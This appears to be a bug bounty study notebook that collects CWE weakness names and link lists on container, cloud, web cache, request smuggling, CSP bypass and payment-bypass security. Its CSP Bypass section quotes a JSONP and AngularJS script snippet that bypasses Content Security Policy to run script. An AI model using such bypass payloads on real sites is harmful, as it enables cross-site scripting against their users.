Embedded Malicious Code - CWE-506
Execution with Unnecessary Privileges - CWE-250
Exposed Dangerous Method or Function - CWE-749
External Control of Critical State Data - CWE-642
Externally Controlled Reference to a Resource in Another Sphere - CWE-610
Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) - CWE-75
File and Directory Information Exposure - CWE-538
Forced Browsing - CWE-425
Fraud
Heap Overflow - CWE-122
HTTP Request Smuggling - CWE-444
HTTP Response Splitting - CWE-113
Improper Access Control - Generic - CWE-284
Improper Authentication
Improper Authentication - Generic - CWE-287
Improper Authorization - CWE-285
Improper Certificate Validation - CWE-295
Improper Check or Handling of Exceptional Conditions - CWE-703
Improper Export of Android Application Components - CWE-926
Improper Following of a Certificate's Chain of Trust - CWE-296
Improper Handling of Highly Compressed Data (Data Amplification) - CWE-409
Improper Handling of Insufficient Permissions or Privileges - CWE-280
Improper Handling of URL Encoding (Hex Encoding) - CWE-177
Improper Export of Android Application Components - CWE-926
Improper Following of a Certificate's Chain of Trust - CWE-296
Improper Handling of Highly Compressed Data (Data Amplification) - CWE-409
Improper Handling of Insufficient Permissions or Privileges - CWE-280
Improper Handling of URL Encoding (Hex Encoding) - CWE-177
Improper Input Validation - CWE-20
Improper Neutralization of Escape, Meta, or Control Sequences - CWE-150
Improper Neutralization of HTTP Headers for Scripting Syntax - CWE-644
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) - CWE-80
Improper Null Termination - CWE-170
Improper Privilege Management - CWE-269
Inadequate Encryption Strength - CWE-326
Inclusion of Functionality from Untrusted Control Sphere - CWE-829
Incomplete Blacklist - CWE-184
Incorrect Authorization - CWE-863
Incorrect Calculation of Buffer Size - CWE-131
Incorrect Comparison - CWE-697
Incorrect Permission Assignment for Critical Resource - CWE-732
Information Disclosure - CWE-200
Information Exposure Through an Error Message - CWE-209
Information Exposure Through Debug Information - CWE-215
Information Exposure Through Directory Listing - CWE-548
Information Exposure Through Discrepancy - CWE-203
Information Exposure Through Sent Data - CWE-201
Information Exposure Through Timing Discrepancy - CWE-208
Insecure Direct Object Reference (IDOR) - CWE-639
Insecure Storage of Sensitive Information - CWE-922
Insecure Temporary File - CWE-377
Insufficient Session Expiration - CWE-613
Insufficiently Protected Credentials - CWE-522
Integer Overflow - CWE-190
Integer Underflow - CWE-191
Key Exchange without Entity Authentication - CWE-322
LDAP Injection - CWE-90
Leftover Debug Code (Backdoor) - CWE-489
Malware - CAPEC-549
Man-in-the-Middle - CWE-300
Memory Corruption - Generic - CWE-119
Misconfiguration - CWE-16
Missing Authentication for Critical Function - CWE-306
Missing Authorization - CWE-862
Missing Encryption of Sensitive Data - CWE-311
Missing Required Cryptographic Step - CWE-325
Modification of Assumed-Immutable Data (MAID) - CWE-471
NULL Pointer Dereference - CWE-476
Off-by-one Error - CWE-193
Open Redirect - CWE-601
OS Command Injection - CWE-78
Out-of-bounds Read - CWE-125
Password in Configuration File - CWE-260
Path Traversal - CWE-22
Path Traversal - CWE-35
Phishing - CAPEC-98
Plaintext Storage of a Password - CWE-256
Privacy Violation - CWE-359
Privilege Escalation - CAPEC-233
Relative Path Traversal - CWE-23
Reliance on Cookies without Validation and Integrity Checking in a Security Decision - CWE-784
Reliance on Reverse DNS Resolution for a Security-Critical Action - CWE-350
Reliance on Untrusted Inputs in a Security Decision - CWE-807
Remote File Inclusion - CWE-98
Replicating Malicious Code (Virus or Worm) - CWE-509
Resource Injection - CWE-99
Reusing a Nonce, Key Pair in Encryption - CWE-323
Reversible One-Way Hash - CWE-328
Scams
Security Through Obscurity - CWE-656
Server-Side Request Forgery (SSRF) - CWE-918
Session Fixation - CWE-384
Spam
SQL Injection - CWE-89
Stack Overflow - CWE-121
Storing Passwords in a Recoverable Format - CWE-257
Time-of-check Time-of-use (TOCTOU) Race Condition - CWE-367
Trust of System Event Data - CWE-360
Type Confusion - CWE-843
UI Redressing (Clickjacking) - CAPEC-103
Unchecked Error Condition - CWE-391
Uncontrolled Recursion - CWE-674
Unprotected Transport of Credentials - CWE-523
Unrestricted Upload of File with Dangerous Type - CWE-434
Untrusted Search Path - CWE-426
Unverified Password Change - CWE-620
Use After Free - CWE-416
Use of a Broken or Risky Cryptographic Algorithm - CWE-327
Use of a Key Past its Expiration Date - CWE-324
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) - CWE-338
Use of Externally-Controlled Format String - CWE-134
Use of Hard-coded Credentials - CWE-798
Use of Hard-coded Cryptographic Key - CWE-321
Use of Hard-coded Password - CWE-259
Use of Inherently Dangerous Function - CWE-242
Use of Insufficiently Random Values - CWE-330
User Interface (UI) Misrepresentation of Critical Information - CWE-451
Violation of Secure Design Principles - CWE-657
Weak Cryptography for Passwords - CWE-261
Weak Password Recovery Mechanism for Forgotten Password - CWE-640
Wrap-around Error - CWE-128
Write-what-where Condition - CWE-123
XML Entity Expansion - CWE-776
XML External Entities (XXE) - CWE-611
XML Injection - CWE-91
XSS - Reflected
XSS Using MIME Type Mismatch - CAPEC-209
        
```

\---- <https://github.com/reddelexc/hackerone-reports/blob/master/tops_100/TOP100UPVOTED.md>

\==<https://github.com/pwnpanda/Bug_Bounty_Reports>

\--<https://github.com/bittentech/SecScraper>

{% embed url="<https://github.com/reddelexc/hackerone-reports>" %}

{% embed url="<https://github.com/phlmox/public-reports/blob/main/hackerone-one-million-reports>" %}


# Response Manipulation

*

![https://twitter.com/Mah3Sec\_/status/1348204024797949953?s=20](/files/-MWFeN8BYkQvNJnvNuhp)


# Client Vs Server Side Vulnerabilities

{% file src="/files/VKQdHiKdAjySwyvfvRf1" %}

{% embed url="<https://blog.harshjaiswal.com/demystifying-the-server-side>" %}


# DevSecOps

* <https://medium.com/@devfire/how-to-become-a-devops-engineer-in-six-months-or-less-part-4-package-47677ca2f058>
* <https://roadmap.sh/devops>
* awesome-devops github
* <https://www.securecodebox.io/>
* <https://github.com/bregman-arie/devops-exercises>
* Practical DevSecOPS
* check grofers eng blog
* <https://medium.com/better-programming/how-to-become-a-devops-engineer-in-2020-7618492a09d8>
* <https://rdsec.net/network/2020/DevSecOps.html>
* <https://devsecops-pipelines.ayushpriya.tech/resources/>


# Containers


# Docker

Docker&#x20;

* <https://github.com/falcosecurity/falco-security-workshop>
* <https://cloudsecwiki.com/docker.html>
* <https://github.com/docker/docker-bench-security>
* <https://github.com/kost/dockscan>
* <https://www.sans.org/reading-room/whitepapers/auditing/checklist-audit-docker-containers-37437>
* <https://www.digitalocean.com/community/tutorials/how-to-audit-docker-host-security-with-docker-bench-for-security-on-ubuntu-16-04>
* <https://github.com/aquasecurity/trivy#vs-quay-docker-hub-gcr>
* <https://github.com/anchore/anchore-engine>
* <https://blog.aquasec.com/aqua-microscanner-free-image-vulnerability-scanning-plug-in-for-jenkins>
* <https://www.slideshare.net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-filesystem-magic-linuxcon>
* <https://learnk8s.io/blog/smaller-docker-images> - nice one
* <https://stackoverflow.com/questions/16047306/how-is-docker-different-from-a-virtual-machine> - \*\*
* <https://www.fosstechnix.com/docker-command-cheat-sheet/>

Tools:

DAgda

Hadolint / Dockle&#x20;

docker linter , <https://github.com/docker-slim/docker-slim>

Learning:

* Katacoda
* <https://github.com/madhuakula/introduction-to-containers-using-docker/blob/master/workshop.md>
* <https://container.training/>
* play with docker
*

Best Practices:

* <https://www.reddit.com/r/docker/comments/9n9e73/the_three_container_security_golden_rules/>
* <https://www.reddit.com/r/devops/comments/9vc562/docker_security_best_practices_host_image_runtime/>
* <https://www.cisecurity.org/benchmark/docker/> - CIS Benchmark
* <https://github.com/BretFisher/ama/issues/17?utm_campaign=FasterOps%3A%20Improving%20Your%20Container%20DevOps%20Skills&utm_medium=email&utm_source=Revue%20newsletter>
*

Blogs:

* <https://www.digitalocean.com/community/tutorials/how-to-audit-docker-host-security-with-docker-bench-for-security-on-ubuntu-16-04>
* <https://opensource.com/article/18/10/podman-more-secure-way-run-containers>
* <https://www.giantswarm.io/blog/building-container-images-with-podman-and-buildah>
* <https://medium.com/better-programming/what-goes-into-a-dockerfile-ff0ace591060>
* <https://www.practical-devsecops.com/author/secfigo/page/2/>

For Practice:

* <https://www.notsosecure.com/vulnerable-docker-vm/>

Security&#x20;

* <https://aws.amazon.com/about-aws/whats-new/2019/10/announcing-image-scanning-for-amazon-ecr/>
* <https://blog.aquasec.com/docker-security-best-practices>
* <https://dev.to/petermbenjamin/docker-security-best-practices-45ih>
* <https://www.cs.ru.nl/bachelors-theses/2020/Joren_Vrancken___4593847___A_Methodology_for_Penetration_Testing_Docker_Systems.pdf>
* <https://dreamlab.net/en/blog/post/abusing-dockersock-exposure/>
* <https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/>
* <https://dejandayoff.com/the-danger-of-exposing-docker.sock/>
* <https://smart7.in/2021/01/30/Securing-Docker-From-Privilege-Escalation.html>

Container Breakouts- <https://blog.nody.cc/posts/container-breakouts-part1/>

* <https://i.blackhat.com/USA-20/Wednesday/us-20-Berta-Defending-Containers-Like-A-Ninja-A-Walk-Through-The-Advanced-Security-Features-Of-Docker-And-Kubernetes.pdf>

```
https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
https://capsule8.com/blog/practical-container-escape-exercise/
https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd?gi=d6343c6632fe
```

+<https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html>


# Kubernetes

* Hacking and Hardening Kubernetes Clusters by Example - Brad Geesaman [https://youtube.com/watch?v=vTgQLzeBfRU…](https://t.co/NBk5rVIwMU?amp=1) One of the best [#kubernetes](https://twitter.com/hashtag/kubernetes?src=hashtag_click) security talks I've seen.![](https://pbs.twimg.com/card_img/1280394190917005312/Uzb6O1d6?format=jpg\&name=240x240)Hacking and Hardening Kubernetes Clusters by Example \[I] - Brad...Hacking and Hardening Kubernetes Clusters by Example \[I] - Brad Geesaman, Symantec While Kubernetes offers new and exciting ways to deploy and scale containe...youtube.com

\\\\<https://www.infracloud.io/blogs/top-10-things-for-container-security/>

\`\`<https://www.optiv.com/explore-optiv-insights/source-zero/anatomy-kubernetes-attack-how-untrusted-docker-images-fail-us>

Tools:

<https://github.com/controlplaneio/kubesec>

<https://github.com/chuckha/kubeyaml>

<https://github.com/viglesiasce/kube-lint>

<https://github.com/instrumenta/kubeval>

<https://github.com/zegl/kube-score>

<https://github.com/stelligent/config-lint>

<https://github.com/cloud66-oss/copper>

<https://github.com/open-policy-agent/conftest/>

{% embed url="<https://github.com/FairwindsOps/polaris#cli>" %}

{% embed url="<https://dev.to/walidshaari/the-ultimate-curated-resources-for-certified-kubernetes-security-specialist-cks-410l>" %}

```
There are some useful articles on The Chief I/O like:
https://thechief.io/c/cloudplex/21-resources-and-tutorials-learn-kubernetes/
https://thechief.io/c/cloudplex/top-20-kubernetes-interview-questions/
https://thechief.io/c/metricfire/kubernetes-networking-101/
https://thechief.io/c/metricfire/introduction-monitoring-kubernetes/
https://thechief.io/c/cloudplex/kubernetes-absolute-beginner-part-i/
https://thechief.io/c/cloudplex/kubernetes-absolute-beginner-part-ii/
https://thechief.io/c/cloudplex/kubernetes-absolute-beginner-part-iii/
https://thechief.io/c/cloudplex/kubernetes-absolute-beginner-part-iv/
More K8s articles:
https://thechief.io/c/category/kubernetes/
```


# Containers

{% embed url="<https://twitter.com/binitamshah/status/1361621611082702848?s=20>" %}

{% embed url="<https://twitter.com/ManasH4rsh/status/1356984688930398212?s=20>" %}

* <https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/>
* <https://github.com/aquasecurity/kube-bench>
* <https://github.com/ekeih/kube-shodan>
* <https://tldrsec.com/blog/tldr-sec-022-appsec-cali-kubernetes-monitoring/>
* <https://github.com/aquasecurity/kube-bench>
* <https://cloudsecwiki.com/kubernetes.html>
* <https://speakerdeck.com/iancoldwater/the-path-less-traveled-abusing-kubernetes-defaults>
* <https://twitter.com/bradgeesaman/status/1186245658015141888>
* <http://carnal0wnage.attackresearch.com/2019/01/kubernetes-master-post.html>
* <https://www.youtube.com/watch?v=fZJ-5rAwcp0>
* <https://raesene.github.io/blog/2019/08/10/making-it-rain-shells-in-Kubernetes/>
* <https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-1/>
* <https://hakin9.org/a-kubernetes-quick-start-for-people-who-know-just-enough-about-docker/>
* <https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/>
* <https://github.com/kubernetes/community/blob/f60981a189ea3a26747524df3a9d16cf9f69afdd/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf> ///<https://www.cncf.io/blog/2019/08/06/open-sourcing-the-kubernetes-security-audit/>
* <http://thefluffyadmin.net/?p=1485><https://www.aquasec.com/resources/kubernetes-101/>
* <https://container.training/>
* <https://github.com/madhuakula/introduction-to-containers-using-docker>
* <https://github.com/appsecco/defcon-26-workshop-attacking-and-auditing-docker-containers>
* <https://www.youtube.com/watch?v=zeS6OyDoy78> - K8s series 101
* <https://medium.com/@flag_seeker/linux-container-from-scratch-339c3ba0411d>
* <https://labs.play-with-k8s.com/>
* <https://twitter.com/IanColdwater/status/1239219333697540096> - Best Resources
* <https://cri-o.io/>
* <https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/> - Attack Tool
*
* <https://anchore.com/integrating-anchore-scanning-into-jenkins-pipeline-via-jenkinsfile/>
* <https://jenkins.io/blog/2018/06/20/anchore-image-scanning/>
* <https://aws.amazon.com/blogs/devops/build-a-continuous-delivery-pipeline-for-your-container-images-with-amazon-ecr-as-source/>
* <https://aws.amazon.com/blogs/compute/scanning-docker-images-for-vulnerabilities-using-clair-amazon-ecs-ecr-aws-codepipeline/>
* <https://jenkins.io/blog/2018/06/20/anchore-image-scanning/>
* <https://aws.amazon.com/blogs/containers/scanning-images-with-trivy-in-an-aws-codepipeline/>
* <https://github.com/genuinetools/amicontained>
* <https://www.marcolancini.it/2018/blog-learn-kubernetes/>
* Tool - <https://github.com/darkbitio/mkit>
* Here's another one  from KubeCon 2019 (Attacking and Defending Kubernetes Clusters: A Guided Tour Walkthrough Guide) - <https://securekubernetes.com/>
* <https://www.bustakube.com>
* Kuberenetes RECON -<https://www.lacework.com/kubernetes-recon-attack-matrix/>
* <https://blog.appsecco.com/kubernetes-from-an-attackers-perspective-owasp-bay-area-meetup-c0c78a5bfb4e>

Blogs

* <https://capsule8.com/blog/container-security-nobody-knows-what-it-means-but-its-provocative/>
* <https://jackleadford.github.io/containers/2020/03/06/pvpost.html>
* <https://www.stackrox.com/post/2017/08/hardening-docker-containers-and-hosts-against-vulnerabilities-a-security-toolkit/>
* <https://www.youtube.com/watch?v=VqThnb-GML4> -- REcon - James Condon

Devsecops:

* <https://kube.academy/courses/building-applications-for-kubernetes>
* <https://www.magalix.com/blog/deploying-an-application-on-kubernetes-from-a-to-z>
* <https://medium.com/rackbrains/kubernetes-101-part-2-deploying-apps-to-kubernetes-cluster-fcad2615d59>

{% embed url="<https://twitter.com/MayaKaczorowski/status/1217499185961951232?ref_src=twsrc%5Etfw>" %}

{% embed url="<https://twitter.com/MichaelCade1/status/1226118676195180545?ref_src=twsrc%5Etfw%22>" %}


# AWS

![](/files/-MWEGTZc1Sy77gsOjqGG)

{% embed url="<https://twitter.com/abhaybhargav/status/1080034019230842880?s=20>" %}

{% embed url="<https://dx1572sre29wk.cloudfront.net/security>" %}

* <https://www.freecodecamp.org/news/pass-the-aws-developer-associate-exam-with-this-free-16-hour-course/>
* <https://www.freecodecamp.org/news/aws-certified-cloud-practitioner-training-2019-free-video-course/>
* <https://www.freecodecamp.org/news/pass-the-aws-certified-solutions-architect-exam-with-this-free-10-hour-course/>
* <https://www.freecodecamp.org/news/awscertified-challenge-free-path-aws-cloud-certifications/>
* <https://www.helenanderson.co.nz/aws-a-z/> -- Good
* <https://cloudnewbies.com/>
* <https://www.marcolancini.it/2018/blog-arsenal-cloud-native-security-tools/#auditing-tools-2>
* <https://gist.github.com/markofu/549fbd287edf08c38e869dacc740e49d>
* <https://github.com/toniblyx/my-arsenal-of-aws-security-tools#s3-buckets-auditing>
* <https://www.ideaminetech.com/blog/aws-services-in-simple-terms/>
* <https://adayinthelifeof.nl/2020/05/20/aws.html>
* <https://zoph.me/posts/2020-07-11-aws-starter-kit-2020-edition/>

From my twitte

* <https://andresriancho.com/automated-security-analysis-aws-clouds/>
*

Nice Resource - <https://coggle.it/diagram/XCx0VU8yTIKcn9xF/t/aws-certified-security-specialty>

{% embed url="<https://medium.com/@rzepsky/passing-the-aws-certified-security-speciality-exam-d5ac90b3cdbc>" %}

Tools to audit

* <https://asecure.cloud/about-assessments/>
* <https://github.com/toniblyx/my-arsenal-of-aws-security-tools>
* <https://github.com/darkbitio/aws-recon>
* <https://medium.com/bugbountywriteup/pentesting-in-the-clouds-introducing-ariacloud-58cb5cc1c50d>
* <https://github.com/iknowjason/ariacloud>
* <https://github.com/z0ph/aws-security-toolbox>
* <https://github.com/Cloud-Architects/cloudiscovery>
* <https://github.com/cr0hn/festin>

Youtube Series - <https://www.youtube.com/playlist?list=PLaF-mVL3srXy4qhzqfPozYzIs4Rq-oNKI&feature=share>

* <https://makosecblog.com/aws-pentest/aws-managed-polcies-that-allow-privesc/>


# Azure

* <https://posts.specterops.io/attacking-azure-azure-ad-part-ii-5f336f36697d>
*


# Others

Work In Progress !!!

* <https://www.hackerone.com/blog/100-hacking-tools-and-resources>


# Code Review

{% embed url="<https://twitter.com/joernchen/status/1341733719804145664?s=20>" %}

{% embed url="<https://twitter.com/AhmedrazaIdrisi/status/1407034012133064705?s=20>" %}

{% embed url="<https://bhichher.notion.site/bhichher/Code-Review-resources-for-Bug-Bounty-3f90799d05a445379083237ed028a822>" %}
<https://twitter.com/rbhichher/status/1474353179651305472?s=20>
{% endembed %}


# Web Sockets

* Whats Wrong With WebSockets - <https://speakerdeck.com/0ang3el/whats-wrong-with-websocket-apis-unveiling-vulnerabilities-in-websocket-apis?slide=7>
* <https://footstep.ninja/posts/websockets-testing/>
* <https://ysamm.com/?p=363>
* <https://www.blackhillsinfosec.com/how-to-hack-websockets-and-socket-io/>
* <https://medium.com/@osamaavvan/exploiting-websocket-application-wide-xss-csrf-66e9e2ac8dfa>
* <https://twitter.com/Hfuhs/status/1470855248596058127?s=20>
*


# Web Cache

* <https://blog.duszynski.eu/domain-hijack-through-http-301-cache-poisoning/>
* <https://portswigger.net/daily-swig/new-technique-hijacks-insecure-connections-via-browser-cache-poisoning>
* <https://www.youtube.com/watch?time_continue=373&v=oBKoocE5id4&feature=emb_logo> - Cache me if you can.
* Cache me if you can ppt - <https://drive.google.com/drive/folders/19IedR-fl5Uea9PeaAgEyYC-dCz7OU7VM>
* <https://twitter.com/digininja/status/1212161764894347264>
* Abusing HOP by HOP - <https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers>
* <https://twitter.com/praseudo/status/1203338825914703872>
* Another Writeup :) Web Cache Deception Attack leads to user info disclosure[![](https://pbs.twimg.com/card_img/1281781791590715393/BIdylHSM?format=png\&name=small)](https://t.co/UVrtUvAY54?amp=1)[Web Cache Deception Attack leads to user info disclosureHello Everyonelink.medium.com](https://t.co/UVrtUvAY54?amp=1)&#x20;
* <https://medium.com/bugbountywriteup/cache-poisoning-with-xss-a-peculiar-case-eb5973850814>
* <https://iustin24.github.io/Cache-Key-Normalization-Denial-of-Service/>
* <https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29>
* <https://iustin24.github.io/Cache-Key-Normalization-Denial-of-Service/?cb=1>
* <https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/>
* <https://galnagli.com/Cache_Poisoning/>
* <https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning>
* <https://infosecwriteups.com/finding-my-first-critical-web-cache-poisoning-6f956799371c>
* <https://youst.in/posts/cache-poisoning-at-scale/>

Tools:

* <https://github.com/c0dejump/HExHTTP>

References:

* [YWH HTTP Header Exploitation](https://blog.yeswehack.com/yeswerhackers/http-header-exploitation/)
* [Cache Poisoning at Scale](https://youst.in/posts/cache-poisoning-at-scale/)
* [abusing http hop-by-hop request headers](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers)
* [Web Cache Entanglement: Novel Pathways to Poisoning](https://portswigger.net/research/web-cache-entanglement)
* [Practical Web Cache Poisoning](https://portswigger.net/research/practical-web-cache-poisoning)
* [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
* [Responsible denial of service with web cache poisoning](https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning)
* [CPDoS.org](https://cpdos.org/)
* [Autopoisoner](https://github.com/Th0h0/autopoisoner)
* [Rachid.A research](https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole)
* <https://strike.sh/blog/uncovering-web-cache-deception>
*

HackerOne Reports:

* [https://hackerone.com/reports/409370](<https://hackerone.com/reports/409370&#xA;https://hackerone.com/reports/728664&#xA;https://hackerone.com/reports/622122&#xA;https://hackerone.com/reports/942629&#xA;https://hackerone.com/reports/1183263&#xA;https://hackerone.com/reports/1096609&#xA;https://hackerone.com/reports/326639>)
* [https://hackerone.com/reports/728664](<https://hackerone.com/reports/409370&#xA;https://hackerone.com/reports/728664&#xA;https://hackerone.com/reports/622122&#xA;https://hackerone.com/reports/942629&#xA;https://hackerone.com/reports/1183263&#xA;https://hackerone.com/reports/1096609&#xA;https://hackerone.com/reports/326639>)
* [https://hackerone.com/reports/622122](<https://hackerone.com/reports/409370&#xA;https://hackerone.com/reports/728664&#xA;https://hackerone.com/reports/622122&#xA;https://hackerone.com/reports/942629&#xA;https://hackerone.com/reports/1183263&#xA;https://hackerone.com/reports/1096609&#xA;https://hackerone.com/reports/326639>)
* [https://hackerone.com/reports/942629](<https://hackerone.com/reports/409370&#xA;https://hackerone.com/reports/728664&#xA;https://hackerone.com/reports/622122&#xA;https://hackerone.com/reports/942629&#xA;https://hackerone.com/reports/1183263&#xA;https://hackerone.com/reports/1096609&#xA;https://hackerone.com/reports/326639>)
* [https://hackerone.com/reports/1183263](<https://hackerone.com/reports/409370&#xA;https://hackerone.com/reports/728664&#xA;https://hackerone.com/reports/622122&#xA;https://hackerone.com/reports/942629&#xA;https://hackerone.com/reports/1183263&#xA;https://hackerone.com/reports/1096609&#xA;https://hackerone.com/reports/326639>)
* [https://hackerone.com/reports/1096609](<https://hackerone.com/reports/409370&#xA;https://hackerone.com/reports/728664&#xA;https://hackerone.com/reports/622122&#xA;https://hackerone.com/reports/942629&#xA;https://hackerone.com/reports/1183263&#xA;https://hackerone.com/reports/1096609&#xA;https://hackerone.com/reports/326639>)
* [https://hackerone.com/reports/326639](<https://hackerone.com/reports/409370&#xA;https://hackerone.com/reports/728664&#xA;https://hackerone.com/reports/622122&#xA;https://hackerone.com/reports/942629&#xA;https://hackerone.com/reports/1183263&#xA;https://hackerone.com/reports/1096609&#xA;https://hackerone.com/reports/326639>)<br>


# HTTP Desync Attacks

* <https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html>
* <https://t.co/L5doH8H9oY?amp=1>
* <https://www.youtube.com/watch?v=vkfBFuH54G4&feature=youtu.be>
* <https://twitter.com/0ffensivemitthu/status/1167445370835742720>
* HTTP Request Smuggling - <https://twitter.com/SpiderSec/status/1200413390339887104>
* Tool - <https://twitter.com/gwendallecoguic/status/1198931102137753602>
* HTTP Smuggling Lab - <https://github.com/ZeddYu/HTTP-Smuggling-Lab>
* Smuggler.py - <https://github.com/gwen001/pentest-tools/blob/master/smuggler.py>
* <https://blog.zeddyu.info/2019/12/08/HTTP-Smuggling-en/>
* <https://bertjwregeer.keybase.pub/2019-12-10%20-%20error_page%20request%20smuggling.pdf>
* <https://twitter.com/Unknownuser1806/status/1220552064478011394>
* <https://www.pentestpartners.com/security-blog/http-request-smuggling-a-how-to/> - Request Sumggling
* HTTP Request Smuggling on Nginx <=1.8.0 (CVE-2020-12440)[ - https://gist.github.com/Glassware123/1023720bf4787375a04f32a0c12e956a](https://gist.github.com/Glassware123/1023720bf4787375a04f32a0c12e956a)
* <https://infosecwriteups.com/exploiting-http-request-smuggling-te-cl-xss-to-website-takeover-c0fc634a661b>
* <https://twitter.com/SpiderSec/status/1200413390339887104>
* <https://github.com/nachiketrathod/HTTP.Request.Smuggling.Desync.Attack/>

{% embed url="<https://twitter.com/fasthm00/status/1435248480516296704?s=20>" %}

u


# Zone Transfer

<https://twitter.com/0xpatrik/status/1169188471438741504>


# CSP Bypass

* <https://twitter.com/CurtBraz/status/1180372698167435265?ref_src=twsrc%5Etfw%7Ctwcamp%5Eembeddedtimeline%7Ctwterm%5Ecollection%3A1183061305483239424%7Ctwcon%5Etimelinechrome&ref_url=https%3A%2F%2Ftwitter.com%2Fpentesterland%2Ftimelines%2F1183061305483239424>
* [#JSONP](https://twitter.com/hashtag/JSONP?src=hashtag_click): \<script src="[https://trustedsite/jsonp?callback=payload">](https://trustedsite/jsonp?callback=payload">) [#AngularJS](https://twitter.com/hashtag/AngularJS?src=hashtag_click) \<script src="[https://trustedsite/angularjs/1.1.3/angularjs.min.js">](https://trustedsite/angularjs/1.1.3/angularjs.min.js">) \<div ng-app ng-csp id=p ng-click=$event.view\.alert(1)> [#BugBountyTip](https://twitter.com/hashtag/BugBountyTip?src=hashtag_click)
* JSONP can be a serious security vulnerability. Another good read from my colleague :)[<br>](https://t.co/u950eyl6DF?amp=1)[Accessing cross-site data using JSONPsjoerdlangkemper.nl](https://t.co/u950eyl6DF?amp=1)
* <https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d>
* [If CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that. This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://jsbin.com/werevijewa/edit?html,output…![Image](https://pbs.twimg.com/media/ECK1OQNXoAA7qk-?format=jpg\&name=small)](https://twitter.com/SecurityMB/status/1162690916722839552?s=20)
* <https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d>
* <http://ghostlulz.com/content-security-policy-csp-bypasses/>
* <https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d>
* <https://github.com/zigoo0/JSONBee>
* <https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/csp-host-checker.py>
* <https://addons.mozilla.org/en-US/firefox/addon/laboratory-by-mozilla/>
* <https://2018.zeronights.ru/wp-content/uploads/materials/3%20ZN2018%20WV%20-%20CSP%20bypass.pdf>
* <https://dropbox.tech/security/unsafe-inline-and-nonce-deployment>
* <https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/>
* <https://scotthelme.co.uk/content-security-policy-an-introduction/>
* <https://scotthelme.co.uk/csp-cheat-sheet/>
* <https://barryvanveen.nl/blog/47-how-to-prevent-the-use-of-unsafe-inline-in-csp>
* <https://www.netsparker.com/blog/web-security/negative-impact-incorrect-csp-implementations/>
* <https://content-security-policy.com/unsafe-inline/>

Articles:

* <https://ritiksahni.me/content-security-policy>


# Payment Bypasses

{% file src="/files/-MTJl\_XDTJSOJvCAe76O" %}

Links:

* <https://medium.com/@vasuyadav0786/exploiting-payment-gateways-97ce7af5a9cf>
* <https://www.slideshare.net/SoroushDalili/how-to-win-big-several-interesting-examples-of-exploiting-financial-gambling-apps>
* <https://infosecwriteups.com/bugbounty-how-i-was-able-to-shop-for-free-payment-price-manipulation-b29355a8e68e>
* <https://stevebiotech.medium.com/race-condition-to-financial-fraud-on-payment-app-b2f9a2457fb3>
* <https://infosecwriteups.com/unique-case-for-price-manipulation-bugbounty-vapt-df57637769cd>
* <https://docs.google.com/presentation/d/1yMLYZbjERTeojwjve7Yh6Pojvljnl0UVAKTY9i-ZaSE/mobilepresent?slide=id.gb240823d22_0_155>

{% embed url="<https://twitter.com/disclosedh1/status/1425219239351365636>" %}


# Http Parameter Pollution

* **HTTP Parameter Pollution - It’s Contaminate**[**https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654**](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)**d**


# Postmessage

* <https://tools.honoki.net/postmessage.html>


# Others

* <https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/>
* <https://thehackerblog.com/the-international-incident-gaining-control-of-a-int-domain-name-with-dns-trickery/>
* GraphQL - <https://twitter.com/prakashashok4/status/1203226709337591810>
* SSRF - <https://twitter.com/s0md3v/status/1210130223334715393>
* RCE - <https://medium.com/@corneacristian/top-25-rce-bug-bounty-reports-bc9555cca7bc>
* <https://github.com/irsdl/top10webseclist>
* <https://noxxi.de/research/breaking-dkim-on-purpose-and-by-chance.html>


# GraphQL

* <https://carvesystems.com/news/the-5-most-common-graphql-security-vulnerabilities/?mkt_tok=eyJpIjoiTWpnMU5EWXdZekk0TnpneSIsInQiOiJHVlR6R2NFcEM5ZzgwNWtrajZzQzBQaTR0UmplRXhLSHZFcDhwNGRcL1JHYnJHaTQ0YlNQODNOSjFpNmNlSjB0bHF2T1JzRWkzSit6TktKSks2dld1VjNIS0lXNHJqUG1NanM3UVowWjVrWFhmYVJQTGQ2a3dWYmgyKzFzeGtjSlIifQ%3D%3D>
* <https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e>

{% embed url="<https://twitter.com/infosec_au/status/1435382712383119360?s=20>" %}


# Unix / Linux

